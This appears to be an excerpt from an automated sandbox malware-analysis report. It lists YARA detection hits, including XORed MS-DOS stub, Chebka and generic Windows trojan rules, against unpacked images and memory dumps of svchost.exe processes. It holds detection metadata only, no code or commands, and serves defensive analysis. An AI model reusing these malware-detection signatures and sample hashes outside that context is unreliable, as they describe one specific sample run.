        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.317215501.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.798463056.00000244FC2B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
        Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.309035814.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.807536432.00000244FE300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
